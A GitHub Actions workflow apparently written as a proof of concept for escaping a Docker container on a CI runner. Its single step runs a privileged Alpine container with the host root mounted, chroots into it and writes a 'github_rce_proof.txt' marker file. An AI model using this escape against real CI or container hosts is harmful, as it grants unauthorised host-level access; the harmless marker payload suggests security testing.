name: Test Docker Escape

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Set up Docker
        run: |
          sudo apt-get update
          sudo apt-get install -y docker.io

      - name: Run Docker with Privileged Mode
        run: |
          docker run --privileged -v /:/mnt --rm -it alpine chroot /mnt sh -c "touch /mnt/tmp/github_rce_proof.txt"
